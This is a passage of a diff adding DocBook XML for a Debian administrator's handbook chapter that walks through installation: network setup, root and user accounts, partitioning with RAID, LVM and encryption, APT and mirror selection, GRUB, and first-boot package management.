+				With the contents of the CD now available, the installer loads all the files necessary to continue with its work. This includes additional drivers for the remaining hardware (especially the network card), as well as all the components of the installation program.
+			</para>
+
+		</section>
+		 <section id="sect.install-detect-network">
+			<title>Detecting Network Hardware</title>
+			 <para>
+				This automatic step tries to identify the network card and load the corresponding module. If automatic detection fails, you can manually select the module to load. If no module works, it is possible to load a specific module from a removable device. This last solution is usually only needed if the appropriate driver is not included in the standard Linux kernel, but available elsewhere, such as the manufacturer's website.
+			</para>
+			 <para>
+				This step must absolutely be successful for <emphasis>netinst</emphasis> installations, since the Debian packages must be loaded from the network.
+			</para>
+
+		</section>
+		 <section id="sect.install-network-config">
+			<title>Configuring the Network</title>
+			 <indexterm>
+				<primary>configuration</primary>
+				<secondary>network</secondary>
+				<tertiary>static</tertiary>
+			</indexterm>
+			 <indexterm>
+				<primary>configuration</primary>
+				<secondary>network</secondary>
+				<tertiary>DHCP</tertiary>
+			</indexterm>
+			 <para>
+				In order to automate the process as much as possible, the installer attempts an automatic network configuration by DHCP (for IPv4) and by IPv6 network discovery. If this fails, it offers more choices: try again with a normal DHCP configuration, attempt DHCP configuration by declaring the name of the machine, or set up a static network configuration.
+			</para>
+			 <para>
+				This last option requires an IP address, a subnet mask, an IP address for a potential gateway, a machine name, and a domain name.
+			</para>
+			 <sidebar> <title><emphasis>TIP</emphasis> Configuration without DHCP</title>
+			 <para>
+				If the local network is equipped with a DHCP server that you do not wish to use because you prefer to define a static IP address for the machine during installation, you can add the <userinput>netcfg/use_dhcp=false</userinput> option when booting from the CD-ROM. You just need to go to the desired menu entry by pressing the <keycap>TAB</keycap> key and add the desired option before pressing the <keycap>Enter</keycap> key.
+			</para>
+			 </sidebar> <sidebar> <title><emphasis>BEWARE</emphasis> Do not improvise</title>
+			 <para>
+				Many local area networks are based on an implicit assumption that all machines can be trusted, and inadequate configuration of a single computer will often perturb the whole network. As a result, do not connect your machine to a network without first agreeing with its administrator on the appropriate settings (for example, the IP address, netmask, and broadcast address).
+			</para>
+			 </sidebar>
+		</section>
+		 <section>
+			<title>Administrator Password</title>
+			 <indexterm>
+				<primary>account</primary>
+				<secondary>administrator account</secondary>
+			</indexterm>
+			 <para>
+				The super-user root account, reserved for the machine's administrator, is automatically created during installation; this is why a password is requested. The installer also asks for a confirmation of the password to prevent any input error which would later be difficult to amend.
+			</para>
+			 <figure>
+				<title>Administrator Password</title>
+				 <mediaobject>
+					<imageobject>
+						<imagedata fileref="images/inst-rootpw.png" format="PNG" scalefit="1" width="65%" />
+					</imageobject>
+
+				</mediaobject>
+
+			</figure>
+			 <sidebar> <title><emphasis>SECURITY</emphasis> Administrator password</title>
+			 <para>
+				The root user's password should be long (8 characters or more) and impossible to guess. Indeed, any computer (and a fortiori any server) connected to the Internet is regularly targeted by automated connection attempts with the most obvious passwords. Sometimes it may even be subject to dictionary attacks, in which many combinations of words and numbers are tested as password. Avoid using the names of children or parents, dates of birth, etc.: many of your co-workers might know them, and you rarely want to give them free access to the computer in question.
+			</para>
+			 <para>
+				These remarks are equally applicable for other user passwords, but the consequences of a compromised account are less drastic for users without administrative rights.
+			</para>
+			 <para>
+				If inspiration is lacking, do not hesitate to use password generators, such as <command>pwgen</command> (in the package of the same name).
+			</para>
+			 </sidebar>
+		</section>
+		 <section>
+			<title>Creating the First User</title>
+			 <para>
+				Debian also imposes the creation of a standard user account so that the administrator doesn't get into the bad habit of working as root. The precautionary principle essentially means that each task is performed with the minimum required rights, in order to limit the damage caused by human error. This is why the installer will ask for the complete name of this first user, their username, and their password (twice, to prevent the risk of erroneous input).
+			</para>
+			 <figure>
+				<title>Name of the first user</title>
+				 <mediaobject>
+					<imageobject>
+						<imagedata fileref="images/inst-username.png" format="PNG" scalefit="1" width="65%" />
+					</imageobject>
+
+				</mediaobject>
+
+			</figure>
+
+		</section>
+		 <section id="sect.install-clock-config">
+			<title>Configuring the Clock</title>
+			 <para>
+				If the network is available, the system's internal clock is updated (in a one-shot way) from an NTP server. This way the timestamps on logs will be correct from the first boot. For them to remain consistently precise over time, an NTP daemon needs to be set up after initial installation (see <xref linkend="sect.time-synchronization" />).
+			</para>
+
+		</section>
+		 <section id="sect.install-detect-disks">
+			<title>Detecting Disks and Other Devices</title>
+			 <para>
+				This step automatically detects the hard drives on which Debian may be installed. They will be presented in the next step: partitioning.
+			</para>
+
+		</section>
+		 <section id="sect.install-partman">
+			<title>Starting the Partitioning Tool</title>
+			 <indexterm>
+				<primary>partitioning</primary>
+			</indexterm>
+			 <sidebar> <title><emphasis>CULTURE</emphasis> Uses of partitioning</title>
+			 <para>
+				Partitioning, an indispensable step in installation, consists in dividing the available space on the hard drives (each subdivision thereof being called a “partition”) according to the data to be stored on it and the use for which the computer is intended. This step also includes choosing the filesystems to be used. All of these decisions will have an influence on performance, data security, and the administration of the server.
+			</para>
+			 </sidebar> <para>
+				The partitioning step is traditionally difficult for new users. It is necessary to define the various portions of the disks (or “partitions”) on which the Linux filesystems and virtual memory (swap) will be stored. This task is complicated if another operating system that you want to keep is already on the machine. Indeed, you will then have to make sure that you do not alter its partitions (or that you resize them without causing damage).
+			</para>
+			 <para>
+				Fortunately, the partitioning software has a “guided” mode which recommends partitions for the user to make — in most cases, you can simply validate the software's suggestions.
+			</para>
+			 <figure>
+				<title>Choice of partitioning mode</title>
+				 <mediaobject>
+					<imageobject>
+						<imagedata fileref="images/inst-partman.png" format="PNG" scalefit="1" width="65%" />
+					</imageobject>
+
+				</mediaobject>
+
+			</figure>
+			 <para>
+				The first screen in the partitioning tool offers the choice of using an entire hard drive to create various partitions. For a (new) computer which will solely use Linux, this option is clearly the simplest, and you can choose the option “Guided - use entire disk”. If the computer has two hard drives for two operating systems, setting one drive for each is also a solution that can facilitate partitioning. In both of these cases, the next screen offers to choose the disk where Linux will be installed by selecting the corresponding entry (for example, “SCSI3 (0,0,0) (sda) - 17.2 GB ATA VBOX HARDDISK”). You then start guided partitioning.
+			</para>
+			 <figure>
+				<title>Disk to use for guided partitioning</title>
+				 <mediaobject>
+					<imageobject>
+						<imagedata fileref="images/inst-partman-disk.png" format="PNG" scalefit="1" width="65%" />
+					</imageobject>
+
+				</mediaobject>
+
+			</figure>
+			 <para>
+				Guided partitioning can also set up LVM logical volumes instead of partitions (see below). Since the remainder of the operation is the same, we will not go over the option “Guided - use entire disk and set up LVM” (encrypted or not).
+			</para>
+			 <para>
+				In other cases, when Linux must work alongside other already existing partitions, you need to choose manual partitioning.
+			</para>
+			 <section id="sect.install-autopartman-mode">
+				<title>Guided partitioning</title>
+				 <indexterm>
+					<primary>partitioning</primary>
+					<secondary>guided partitioning</secondary>
+				</indexterm>
+				 <para>
+					The guided partitioning tool offers three partitioning methods, which correspond to different usages.
+				</para>
+				 <figure>
+					<title>Guided partitioning</title>
+					 <mediaobject>
+						<imageobject>
+							<imagedata fileref="images/inst-autopartman-mode.png" format="PNG" scalefit="1" width="65%" />
+						</imageobject>
+
+					</mediaobject>
+
+				</figure>
+				 <para>
+					The first method is called “All files in one partition”. The entire Linux system tree is stored in a single filesystem, corresponding to the root <filename>/</filename> directory. This simple and robust partitioning fits perfectly for personal or single-user systems. In fact, two partitions will be created: the first will house the complete system, the second the virtual memory (swap).
+				</para>
+				 <para>
+					The second method, “Separate <filename>/home/</filename> partition”, is similar, but splits the file hierarchy in two: one partition contains the Linux system (<filename>/</filename>), and the second contains “home directories” (meaning user data, in files and subdirectories available under <filename>/home/</filename>).
+				</para>
+				 <para>
+					The last partitioning method, called “Separate <filename>/home</filename>, <filename>/var</filename>, and <filename>/tmp</filename> partitions”, is appropriate for servers and multi-user systems. It divides the file tree into many partitions: in addition to the root (<filename>/</filename>) and user accounts (<filename>/home/</filename>) partitions, it also has partitions for server software data (<filename>/var/</filename>), and temporary files (<filename>/tmp/</filename>). These divisions have several advantages. Users can not lock up the server by consuming all available hard drive space (they can only fill up <filename>/tmp/</filename> and <filename>/home/</filename>). The daemon data (especially logs) can no longer clog up the rest of the system.
+				</para>
+				 <sidebar> <title><emphasis>BACK TO BASICS</emphasis> Choosing a filesystem</title>
+				 <indexterm>
+					<primary>system</primary>
+					<secondary>filesystem</secondary>
+				</indexterm>
+				 <indexterm>
+					<primary>file</primary>
+					<secondary>system</secondary>
+				</indexterm>
+				 <para>
+					A filesystem defines the way in which data is organized on the hard drive. Each existing filesystem has its merits and limitations. Some are more robust, others more effective: if you know your needs well, choosing the most appropriate filesystem is possible. Various comparisons have already been made; it seems that <emphasis>ReiserFS</emphasis> is particularly efficient for reading many small files; <emphasis>XFS</emphasis>, in turn, works faster with large files. <emphasis>Ext4</emphasis>, the default filesystem for Debian, is a good compromise, based on the three previous versions of filesystems historically used in Linux (<emphasis>ext</emphasis>, <emphasis>ext2</emphasis> and <emphasis>ext3</emphasis>). <emphasis>Ext4</emphasis> overcomes certain limitations of <emphasis>ext3</emphasis> and is particularly appropriate for very large capacity hard drives. Another option would be to experiment with the very promising <emphasis>btrfs</emphasis>, which includes numerous features that require, to this day, the use of LVM and/or RAID.
+				</para>
+				 <para>
+					A journalized filesystem (such as <emphasis>ext3</emphasis>, <emphasis>ext4</emphasis>, <emphasis>btrfs</emphasis>, <emphasis>reiserfs</emphasis>, or <emphasis>xfs</emphasis>) takes special measures to make it possible to return to a prior consistent state after an abrupt interruption without completely analyzing the entire disk (as was the case with the <emphasis>ext2</emphasis> system). This functionality is carried out by filling in a journal that describes the operations to conduct prior to actually executing them. If an operation is interrupted, it will be possible to “replay” it from the journal. Conversely, if an interruption occurs during an update of the journal, the last requested change is simply ignored; the data being written could be lost, but since the data on the disk has not changed, they have remained coherent. This is nothing more nor less than a transactional mechanism applied to the filesystem.
+				</para>
+				 </sidebar> <para>
+					After choosing the type of partition, the software calculates a suggestion, and describes it on the screen; the user can then modify it if needed. You can, in particular, choose another filesystem if the standard choice (<emphasis>ext4</emphasis>) isn't appropriate. In most cases, however, the proposed partitioning is reasonable and it can be accepted by selecting the “Finish partitioning and write changes to disk” entry.
+				</para>
+				 <figure>
+					<title>Validating partitioning</title>
+					 <mediaobject>
+						<imageobject>
+							<imagedata fileref="images/inst-partman-validation.png" format="PNG" scalefit="1" width="65%" />
+						</imageobject>
+
+					</mediaobject>
+
+				</figure>
+
+			</section>
+			 <section id="sect.manual-partitioning">
+				<title>Manual Partitioning</title>
+				 <indexterm>
+					<primary>partitioning</primary>
+					<secondary>manual partitioning</secondary>
+				</indexterm>
+				 <para>
+					Manual partitioning allows greater flexibility, allowing the user to choose the purpose and size of each partition. Furthermore, this mode is unavoidable if you wish to use software RAID.
+				</para>
+				 <sidebar id="sidebar.shrinking-partition"> <title><emphasis>IN PRACTICE</emphasis> Shrinking a Windows partition</title>
+				 <indexterm>
+					<primary>resize a partition</primary>
+				</indexterm>
+				 <indexterm>
+					<primary>shrink a partition</primary>
+				</indexterm>
+				 <para>
+					To install Debian alongside an existing operating system (Windows or other), you must have some available hard drive space that is not being used by the other system in order to be able to create the partitions dedicated to Debian. In most cases, this means shrinking a Windows partition and reusing the freed space.
+				</para>
+				 <para>
+					The Debian installer allows this operation when using the manual mode for partitioning. You only need to choose the Windows partition and enter its new size (this works the same with both FAT and NTFS partitions).
+				</para>
+				 </sidebar> <para>
+					The first screen displays the available disks, their partitions, and any possible free space that has not yet been partitioned. You can select each displayed element; pressing the <keycap>Enter</keycap> key then gives a list of possible actions.
+				</para>
+				 <para>
+					You can erase all partitions on a disk by selecting it.
+				</para>
+				 <para>
+					When selecting free space on a disk, you can manually create a new partition. You can also do this with guided partitioning, which is an interesting solution for a disk that already contains another operating system, but which you may wish to partition for Linux in a standard manner. See <xref linkend="sect.install-autopartman-mode" /> for more details on guided partitioning.
+				</para>
+				 <sidebar> <title><emphasis>BACK TO BASICS</emphasis> Mount point</title>
+				 <indexterm>
+					<primary>mount point</primary>
+				</indexterm>
+				 <indexterm>
+					<primary>point, mount point</primary>
+				</indexterm>
+				 <para>
+					The mount point is the directory tree that will house the contents of the filesystem on the selected partition. Thus, a partition mounted at <filename>/home/</filename> is traditionally intended to contain user data.
+				</para>
+				 <para>
+					When this directory is named “<filename>/</filename>”, it is known as the <emphasis>root</emphasis> of the file tree, and therefore the root of the partition that will actually host the Debian system.
+				</para>
+				 </sidebar> <sidebar> <title><emphasis>BACK TO BASICS</emphasis> Virtual memory, swap</title>
+				 <indexterm>
+					<primary>virtual memory</primary>
+				</indexterm>
+				 <indexterm>
+					<primary>swap</primary>
+				</indexterm>
+				 <indexterm>
+					<primary>partition</primary>
+					<secondary>swap partition</secondary>
+				</indexterm>
+				 <indexterm>
+					<primary>swap partition</primary>
+				</indexterm>
+				 <para>
+					Virtual memory allows the Linux kernel, when lacking sufficient memory (RAM), to free a bit of storage by storing the parts of the RAM that have been inactive for some time on the swap partition of the hard disk.
+				</para>
+				 <para>
+					To simulate the additional memory, Windows uses a swap file that is directly contained in a filesystem. Conversely, Linux uses a partition dedicated to this purpose, hence the term “swap partition”.
+				</para>
+				 </sidebar> <para>
+					When choosing a partition, you can indicate the manner in which you are going to use it:
+				</para>
+				 <itemizedlist>
+					<listitem>
+						<para>
+							format it and include it in the file tree by choosing a mount point;
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							use it as a swap partition;
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							make it into a “physical volume for encryption” (to protect the confidentiality of data on certain partitions, see below);
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							make it a “physical volume for LVM” (this concept is discussed in greater detail later in this chapter);
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							use it as a RAID device (see later in this chapter);
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							you can also choose not to use it, and therefore leave it unchanged.
+						</para>
+
+					</listitem>
+
+				</itemizedlist>
+
+			</section>
+			 <section id="sect.install-software-raid">
+				<title>Configuring Multidisk Devices (Software RAID)</title>
+				 <indexterm>
+					<primary>RAID</primary>
+					<secondary>Software RAID</secondary>
+				</indexterm>
+				 <indexterm>
+					<primary>Software RAID</primary>
+				</indexterm>
+				 <indexterm>
+					<primary>device</primary>
+					<secondary>multi-disk device</secondary>
+				</indexterm>
+				 <para>
+					Some types of RAID allow the duplication of information stored on hard drives to prevent data loss in the event of a hardware problem affecting one of them. Level 1 RAID keeps a simple, identical copy (mirror) of a hard drive on another drive, while level 5 RAID splits redundant data over several disks, thus allowing the complete reconstruction of a failing drive.
+				</para>
+				 <para>
+					We will only describe level 1 RAID, which is the simplest to implement. The first step involves creating two partitions of identical size located on two different hard drives, and to label them “physical volume for RAID”.
+				</para>
+				 <para>
+					You must then choose “Configure software RAID” in the partitioning tool to combine these two partitions into a new virtual disk and select “Create MD device” in the configuration screen. You then need to answer a series of questions about this new device. The first question asks about the RAID level to use, which in our case will be “RAID1”. The second question asks about the number of active devices — two in our case, which is the number of partitions that need to be included in this MD device. The third question is about the number of spare devices — 0; we have not planned any additional disk to take over for a possible defective disk. The last question requires you to choose the partitions for the RAID device — these would be the two that we have set aside for this purpose (make sure you only select the partitions that explicitly mention “raid”).
+				</para>
+				 <para>
+					Back to the main menu, a new virtual “RAID” disk appears. This disk is presented with a single partition which can not be deleted, but whose use we can choose (just like for any other partition).
+				</para>
+				 <para>
+					For further details on RAID functions, please refer to <xref linkend="sect.raid-soft" />.
+				</para>
+
+			</section>
+			 <section id="sect.install-lvm">
+				<title>Configuring the Logical Volume Manager (LVM)</title>
+				 <indexterm>
+					<primary>LVM</primary>
+					<secondary>during installation</secondary>
+				</indexterm>
+				 <indexterm>
+					<primary>Logical Volume Manager</primary>
+					<secondary>during installation</secondary>
+				</indexterm>
+				 <para>
+					LVM allows you to create “virtual” partitions that span over several disks. The benefits are twofold: the size of the partitions are no longer limited by individual disks but by their cumulative volume, and you can resize existing partitions at any time, possibly after adding an additional disk when needed.
+				</para>
+				 <para>
+					LVM uses a particular terminology: a virtual partition is a “logical volume”, which is part of a “volume group”, or an association of several “physical volumes”. Each of these terms in fact corresponds to a “real” partition (or a software RAID device).
+				</para>
+				 <indexterm>
+					<primary>volume</primary>
+					<secondary>logical volume</secondary>
+				</indexterm>
+				 <indexterm>
+					<primary>volume</primary>
+					<secondary>physical volume</secondary>
+				</indexterm>
+				 <indexterm>
+					<primary>group</primary>
+					<secondary>of volumes</secondary>
+				</indexterm>
+				 <indexterm>
+					<primary>volume</primary>
+					<secondary>group</secondary>
+				</indexterm>
+				 <para>
+					This technique works in a very simple way: each volume, whether physical or logical, is split into blocks of the same size, which are made to correspond by LVM. The addition of a new disk will cause the creation of a new physical volume, and these new blocks can be associated to any volume group. All of the partitions in the volume group that is thus expanded will have additional space into which they can extend.
+				</para>
+				 <para>
+					The partitioning tool configures LVM in several steps. First you must create on the existing disks the partitions that will be “physical volumes for LVM”. To activate LVM, you need to choose “Configure the Logical Volume Manager (LVM)”, then on the same configuration screen “Create a volume group”, to which you will associate the existing physical volumes. Finally, you can create logical volumes within this volume group. Note that the automatic partitioning system can perform all these steps automatically.
+				</para>
+				 <para>
+					In the partitioning menu, each physical volume will appear as a disk with a single partition which can not be deleted, but that you can use as desired.
+				</para>
+				 <para>
+					The usage of LVM is described in further detail in <xref linkend="sect.lvm" />.
+				</para>
+
+			</section>
+			 <section>
+				<title>Setting Up Encrypted Partitions</title>
+				 <indexterm>
+					<primary>LUKS</primary>
+				</indexterm>
+				 <indexterm>
+					<primary>dm-crypt</primary>
+				</indexterm>
+				 <indexterm>
+					<primary>partition</primary>
+					<secondary>encrypted</secondary>
+				</indexterm>
+				 <indexterm>
+					<primary>partition encryption</primary>
+				</indexterm>
+				 <indexterm>
+					<primary>confidentiality</primary>
+					<secondary>files</secondary>
+				</indexterm>
+				 <indexterm>
+					<primary>file</primary>
+					<secondary>confidentiality</secondary>
+				</indexterm>
+				 <para>
+					To guarantee the confidentiality of your data, for instance in the event of the loss or theft of your computer or a hard drive, it is possible to encrypt the data on some partitions. This feature can be added underneath any filesystem, since, as for LVM, Linux (and more particularly the dm-crypt driver) uses the Device Mapper to create a virtual partition (whose content is protected) based on an underlying partition that will store the data in an encrypted form (thanks to LUKS, Linux Unified Key Setup, a standard format that enables the storage of encrypted data as well as meta-information that indicates the encryption algorithms used).
+				</para>
+				 <sidebar id="sidebar.encrypted-swap-partition"> <title><emphasis>SECURITY</emphasis> Encrypted swap partition</title>
+				 <para>
+					When an encrypted partition is used, the encryption key is stored in memory (RAM). Since retrieving this key allows the decryption of the data, it is of utmost importance to avoid leaving a copy of this key that would be accessible to the possible thief of the computer or hard drive, or to a maintenance technician. This is however something that can easily occur with a laptop, since when hibernating the contents of RAM is stored on the swap partition. If this partition isn't encrypted, the thief may access the key and use it to decrypt the data from the encrypted partitions. This is why, when you use encrypted partitions, it is imperative to also encrypt the swap partition!
+				</para>
+				 <para>
+					The Debian installer will warn the user if they try to make an encrypted partition while the swap partition isn't encrypted.
+				</para>
+				 </sidebar> <para>
+					To create an encrypted partition, you must first assign an available partition for this purpose. To do so, select a partition and indicate that it is to be used as a “physical volume for encryption”. After partitioning the disk containing the physical volume to be made, choose “Configure encrypted volumes”. The software will then propose to initialize the physical volume with random data (making the localization of the real data more difficult), and will ask you to enter an “encryption passphrase”, which you will have to enter every time you boot your computer in order to access the content of the encrypted partition. Once this step has been completed, and you have returned to the partitioning tool menu, a new partition will be available in an “encrypted volume”, which you can then configure just like any other partition. In most cases, this partition is used as a physical volume for LVM so as to protect several partitions (LVM logical volumes) with the same encryption key, including the swap partition (see sidebar <xref linkend="sidebar.encrypted-swap-partition" />).
+				</para>
+
+			</section>
+
+		</section>
+		 <section>
+			<title>Installing the Base System</title>
+			 <indexterm>
+				<primary>system</primary>
+				<secondary>base</secondary>
+			</indexterm>
+			 <para>
+				This step, which doesn't require any user interaction, installs the Debian “base system” packages. This includes the <command>dpkg</command> and <command>apt</command> tools, which manage Debian packages, as well as the utilities necessary to boot the system and start using it.
+			</para>
+			 <figure>
+				<title>Installation of the base system</title>
+				 <mediaobject>
+					<imageobject>
+						<imagedata fileref="images/inst-basesystem.png" format="PNG" scalefit="1" width="65%" />
+					</imageobject>
+
+				</mediaobject>
+
+			</figure>
+
+		</section>
+		 <section>
+			<title>Configuring the Package Manager (<command>apt</command>)</title>
+			 <indexterm>
+				<primary>configuration</primary>
+				<secondary>initial configuration of APT</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>APT</primary>
+				<secondary>initial configuration</secondary>
+			</indexterm>
+			 <para>
+				In order to be able to install additional software, APT needs to be configured and told where to find Debian packages. This step is as automated as possible. It starts with a question asking if it must use a network source for packages, or if it should only look for packages on the CD-ROM.
+			</para>
+			 <sidebar> <title><emphasis>NOTE</emphasis> Debian CD-ROM in the drive</title>
+			 <para>
+				If the installer detects a Debian installation disk in the CD/DVD reader, it is not necessary to configure APT to go looking for packages on the network: APT is automatically configured to read packages from a removable media drive. If the disk is part of a set, the software will offer to “explore” other disks in order to reference all of the packages stored on them.
+			</para>
+			 </sidebar> <para>
+				If getting packages from the network is requested, the next two questions allow to choose a server from which to download these packages, by choosing first a country, then a mirror available in that country (a mirror is a public server hosting copies of all the files of the Debian master archive).
+			</para>
+			 <figure>
+				<title>Selecting a Debian mirror</title>
+				 <mediaobject>
+					<imageobject>
+						<imagedata fileref="images/inst-mirror.png" format="PNG" scalefit="1" width="65%" />
+					</imageobject>
+
+				</mediaobject>
+
+			</figure>
+			 <para>
+				Finally, the program proposes to use an HTTP proxy. If there is no proxy, Internet access will be direct. If you type <literal>http://proxy.falcot.com:3128</literal>, APT will use the Falcot <foreignphrase>proxy/cache</foreignphrase>, a “Squid” program. You can find these settings by checking the configurations of a web browser on another machine connected to the same network.
+			</para>
+			 <para>
+				The files <filename>Packages.xz</filename> and <filename>Sources.xz</filename> are then automatically downloaded to update the list of packages recognized by APT.
+			</para>
+			 <sidebar> <title><emphasis>BACK TO BASICS</emphasis> HTTP proxy</title>
+			 <indexterm>
+				<primary>proxy</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>proxy cache</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>cache, proxy</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Squid</primary>
+			</indexterm>
+			 <para>
+				An HTTP proxy is a server that forwards an HTTP request for network users. It sometimes helps to speed up downloads by keeping a copy of files that have been transferred through it (we then speak of proxy/cache). In some cases, it is the only means of accessing an external web server; in such cases it is essential to answer the corresponding question during installation for the program to be able to download the Debian packages through it.
+			</para>
+			 <para>
+				Squid is the name of the server software used by Falcot Corp to offer this service.
+			</para>
+			 </sidebar>
+		</section>
+		 <section>
+			<title>Debian Package Popularity Contest</title>
+			 <para>
+				The Debian system contains a package called <emphasis role="pkg">popularity-contest</emphasis>, whose purpose is to compile package usage statistics. Each week, this program collects information on the packages installed and those used recently, and anonymously sends this information to the Debian project servers. The project can then use this information to determine the relative importance of each package, which influences the priority that will be granted to them. In particular, the most “popular” packages will be included in the installation CD-ROM, which will facilitate their access for users who do not wish to download them or to purchase a complete set.
+			</para>
+			 <para>
+				This package is only activated on demand, out of respect for the confidentiality of users' usage.
+			</para>
+
+		</section>
+		 <section>
+			<title>Selecting Packages for Installation</title>
+			 <para>
+				The following step allows you to choose the purpose of the machine in very broad terms; the ten suggested tasks correspond to lists of packages to be installed. The list of the packages that will actually be installed will be fine-tuned and completed later on, but this provides a good starting point in a simple manner.
+			</para>
+			 <para>
+				Some packages are also automatically installed according to the hardware detected (thanks to the program <command>discover-pkginstall</command> from the <emphasis role="pkg">discover</emphasis> package).
+			</para>
+			 <figure>
+				<title>Task choices</title>
+				 <mediaobject>
+					<imageobject>
+						<imagedata fileref="images/inst-tasksel.png" format="PNG" scalefit="1" width="65%" />
+					</imageobject>
+
+				</mediaobject>
+
+			</figure>
+
+		</section>
+		 <section id="sect.installing-grub">
+			<title>Installing the GRUB Bootloader</title>
+			 <indexterm>
+				<primary>loader</primary>
+				<secondary>bootloader</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>bootloader</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>GRUB</primary>
+			</indexterm>
+			 <para>
+				The bootloader is the first program started by the BIOS. This program loads the Linux kernel into memory and then executes it. It often offers a menu that allows the user to choose the kernel to load and/or the operating system to boot.
+			</para>
+			 <sidebar id="sidebar.bootloader-dual-boot"> <title><emphasis>BEWARE</emphasis> Bootloader and dual boot</title>
+			 <indexterm>
+				<primary>dual boot</primary>
+			</indexterm>
+			 <para>
+				This phase in the Debian installation process detects the operating systems that are already installed on the computer, and automatically adds corresponding entries in the boot menu, but not all installation programs do this.
+			</para>
+			 <para>
+				In particular, if you install (or reinstall) Windows thereafter, the bootloader will be erased. Debian will still be on the hard drive, but will no longer be accessible from the boot menu. You would then have to boot the Debian installation system in <userinput>rescue</userinput> mode to set up a less exclusive bootloader. This operation is described in detail in the installation manual. <ulink type="block" url="http://www.debian.org/releases/stable/amd64/ch08s07.html" />
+			</para>
+			 </sidebar> <para>
+				By default, the menu proposed by GRUB contains all the installed Linux kernels, as well as any other operating systems that were detected. This is why you should accept the offer to install it in the Master Boot Record. Since keeping older kernel versions preserves the ability to boot the same system if the most recently installed kernel is defective or poorly adapted to the hardware, it often makes sense to keep a few older kernel versions installed.
+			</para>
+			 <para>
+				GRUB is the default bootloader installed by Debian thanks to its technical superiority: it works with most filesystems and therefore doesn't require an update after each installation of a new kernel, since it reads its configuration during boot and finds the exact position of the new kernel. Version 1 of GRUB (now known as “Grub Legacy”) couldn't handle all combinations of LVM and software RAID; version 2, installed by default, is more complete. There may still be situations where it is more recommendable to install LILO (another bootloader); the installer will suggest it automatically.
+			</para>
+			 <para>
+				For more information on configuring GRUB, please refer to <xref linkend="sect.config-grub" />.
+			</para>
+			 <sidebar> <title><emphasis>BEWARE</emphasis> Bootloaders and architectures</title>
+			 <para>
+				LILO and GRUB, which are mentioned in this chapter, are bootloaders for <emphasis>i386</emphasis> and <emphasis>amd64</emphasis> architectures. If you install Debian on another architecture, you will need to use another bootloader. Among others, we can cite <command>yaboot</command> or <command>quik</command> for <emphasis>powerpc</emphasis>, <command>silo</command> for <emphasis>sparc</emphasis>, <command>aboot</command> for <emphasis>alpha</emphasis>, <command>arcboot</command> for <emphasis>mips</emphasis>.
+			</para>
+			 </sidebar>
+		</section>
+		 <section>
+			<title>Finishing the Installation and Rebooting</title>
+			 <para>
+				The installation is now complete, the program invites you to remove the CD-ROM from the reader and to restart the computer.
+			</para>
+
+		</section>
+
+	</section>
+	 <section id="sect.after-first-boot">
+		<title>After the First Boot</title>
+		 <para>
+			If you activated the task “Debian desktop environment” without any explicit desktop choice (or with the “GNOME” choice), the computer will display the <command>gdm3</command> login manager.
+		</para>
+		 <figure>
+			<title>First boot</title>
+			 <mediaobject>
+				<imageobject>
+					<imagedata fileref="images/inst-gdm.png" format="PNG" scalefit="1" width="65%" />
+				</imageobject>
+
+			</mediaobject>
+
+		</figure>
+		 <para>
+			The user that has already been created can then log in and begin working immediately.
+		</para>
+		 <section>
+			<title>Installing Additional Software</title>
+			 <para>
+				The installed packages correspond to the profiles selected during installation, but not necessarily to the use that will actually be made of the machine. As such, you might want to use a package management tool to refine the selection of installed packages. The two most frequently used tools (which are installed if the “Debian desktop environment” profile was chosen) are <command>apt</command> (accessible from the command line) and <command>synaptic</command> (“Synaptic Package Manager” in the menus).
+			</para>
+			 <para>
+				To facilitate the installation of coherent groups of programs, Debian creates “tasks” that are dedicated to specific uses (mail server, file server, etc.). You already had the opportunity to select them during installation, and you can access them again thanks to package management tools such as <command>aptitude</command> (the tasks are listed in a distinct section) and <command>synaptic</command> (through the menu <menuchoice> <guimenu>Edit</guimenu> <guimenuitem>Mark Packages by Task…</guimenuitem> </menuchoice>).
+			</para>
+			 <para>
+				Aptitude is an interface to APT in full-screen text mode. It allows the user to browse the list of available packages according to various categories (installed or not-installed packages, by task, by section, etc.), and to view all of the information available on each of them (dependencies, conflicts, description, etc.). Each package can be marked “install” (to be installed, <keycap>+</keycap> key) or “remove” (to be removed, <keycap>-</keycap> key). All of these operations will be conducted simultaneously once you've confirmed them by pressing the <keycap>g</keycap> key (“g” for “go!”). If you have forgotten some programs, no worries; you will be able to run <command>aptitude</command> again once the initial installation has been completed.
+			</para>
+			 <indexterm>
+				<primary>aptitude</primary>
+			</indexterm>
+			 <sidebar> <title><emphasis>TIP</emphasis> Debian thinks of speakers of non-English languages</title>
+			 <para>
+				Several tasks are dedicated to the localization of the system in other languages beyond English. They include translated documentation, dictionaries, and various other packages useful for speakers of different languages. The appropriate task is automatically selected if a non-English language was chosen during installation.
+			</para>
+			 </sidebar> <sidebar> <title><emphasis>CULTURE</emphasis> <command>dselect</command>, the old interface to install packages</title>
+			 <para>
+				Before <command>aptitude</command>, the standard program to select packages to be installed was <command>dselect</command>, the old graphical interface associated with <command>dpkg</command>. Being a difficult program for beginners to use, it is not recommended.
+			</para>
+			 <indexterm>
+				<primary><command>dselect</command></primary>
+			</indexterm>
+			 </sidebar> <para>
+				Of course, it is possible not to select any task to be installed. In this case, you can manually install the desired software with the <command>apt</command> or <command>aptitude</command> command (which are both accessible from the command line).
+			</para>
+			 <sidebar> <title><emphasis>VOCABULARY</emphasis> Package dependencies, conflicts</title>
+			 <para>
+				In the Debian packaging lingo, a “dependency” is another package necessary for the proper functioning of the package in question. Conversely, a “conflict” is a package that can not be installed side-by-side with another.
+			</para>
+			 <para>
+				These concepts are discussed in greater detail in <xref linkend="packaging-system" />.
+			</para>
+			 </sidebar>
+		</section>
+		 <section>
+			<title>Upgrading the System</title>
+			 <indexterm>
+				<primary>safe-upgrade</primary>
+			</indexterm>
+			 <para>
